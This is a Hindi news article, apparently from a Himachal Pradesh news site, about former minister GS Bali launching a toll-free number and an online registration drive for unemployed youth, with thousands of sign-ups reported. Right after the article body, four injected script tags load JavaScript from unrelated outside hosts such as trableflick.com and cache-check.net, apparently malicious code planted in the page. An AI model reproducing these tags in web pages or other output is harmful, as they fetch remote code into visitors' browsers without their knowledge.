<p>पूर्व मंत्री जीएस बाली कोरोना संकट के दौर में सोशल मीडिया के जरिये लगातार समर्थकों से बात कर रहे हैं । इस दौरान वर्तमान सरकार की खामियों को भी प्रदेश की जनता के सामने रख रहे हैं । पूर्व मंत्री 16 अगस्त की शाम को भी सोशल मीडिया के जरिये अपने प्रशंसकों से जुड़े और बेरोजगारों को लेकर अपने किये वायदे की तरफ पहला कदम बढ़ाया । पूर्व मंत्री ने प्रदेश के बेरोजगारों के लिये एक टोल-फ्री नंबर (74200 00001) जारी किया और ऑन-लाइन रजिस्ट्रेशन फॉर्म भी जारी किया । जिसमें प्रदेश भर के बेरोजगार युवक खुद को पंजिकृत कर सकते हैं । इसके साथ ही जो युवक ऑनलाइन फॉर्म खुद नहीं भर सकते, उसे प्रदेश भर के वॉलंटियर फ्री में उन्हें ये फॉर्म उपलब्ध करवायेंगे । 16 अगस्त की शाम, इस फॉर्म को जारी करते हुए पूर्व मंत्री ने प्रदेश के ऐसे युवाओं को स्नो टाइगर के नाम से नवाजा था ।</p>
<p>इस रजिस्ट्रेशन फॉर्म के जारी हुए अभी 72 घंटे हुए है । इतने कम समय में ही प्रदेश भर के हजारों लोगों ने इसमें रजिस्ट्रेशन करवाया है । तीन दिन में टोल-फ्री नंबर के जरिये भी सैकड़ों युवाओं ने पूर्व मंत्री के इस अभियान को ताकत दी है । पूर्व मंत्री जीएस बाली ने हजारों की संख्या में हुए रजिस्ट्रेशन पर अपनी प्रतिक्रिया देते हुए कहा कि इतनी बड़ी संख्या में लोगों ने पंजीकरण करके हमें चौंकाया है । इनमें पढ़ाई पूरी करके नौकरी की तलाश शुरू करने वाले बच्चे भी हैं तो ऐसे लोग भी हैं, जो नौकरी की आस में कई सालों से घर बैठे हैं या स्वरोजगार से जुड़े थे। यह दर्शाता है कि बेरोजगारी दूर करने की दिशा में कितने ज्यादा प्रयास करने की जरूरत है।</p>
<p>आपको याद होगा पूर्व मंत्री ने कुछ दिनों पहले कहा था कि अगली दफा जब प्रदेश में कांग्रेस की सरकार आयेगी तो प्रदेश के दो लाख बेरोजगारों को नौकरी दी जायेगी और बेरोजगारी भत्ता को लेकर भी कदम उठाया जायेगा । इसके लिये उन्होंने अपना रोड मैप भी बताया था । उसके बाद स्वतंत्रता दिवस के अगले दिन, उन्होंने बेरोजगारों को लेकर रजिस्ट्रेशन प्रक्रिया की शुरुआत भी कर दी । और, तीन दिनों में ही उसके नतीजे हजारों की संख्या में पंजीकरण के तौर पर नजर आने लगे है । ये आंकडे बता रहे हैं कि बेरोजगारी कितनी बड़ी लड़ाई आज के युवाओं के समक्ष है । ऐसे में इतनी बड़ी चुनौती को हल्के में नहीं लिया जा सकता । जो लोग इसके समाधान के लिये प्रयास करते हैं, उनको समर्थन देने की जरुरत है ।</p>
<p>लिंक पर क्लिक कर करें रजिस्ट्रेशन shorturl.at/svyT6</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8620x&format=arrjs&r=1597842542099″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&title=a&blocks[]=31af2″ type=”text/javascript”></script>
Free Medical Camp Shimla : विभाग हिमाचल प्रदेश, इनर व्हील क्लब शिमला मिडटाउन और ग्राम…
शिक्षा मंत्री ने पोर्टमोर स्कूल में नवाजी प्रतिभावान एवं मेधावी छात्राएं शिमला: शिक्षा मंत्री रोहित…
HimachalWinterSession : हिमाचल प्रदेश विधान सभा के अध्यक्ष कुलदीप सिंह पठानिया ने जानकारी दी कि…
हमीरपुर: अणु के सिंथेटिक ट्रैक ग्राउंड में भारतीय थल सेना की अग्निवीर भर्ती रैली के…
Bhota Charitable Hospital protest: राधा स्वामी चैरिटेबल अस्पताल भोटा को बंद किए जाने के…
Pump Attendant Promotion : हिमाचल प्रदेश के ग्रामीण क्षेत्रों में लंबे समय से सेवाएं दे…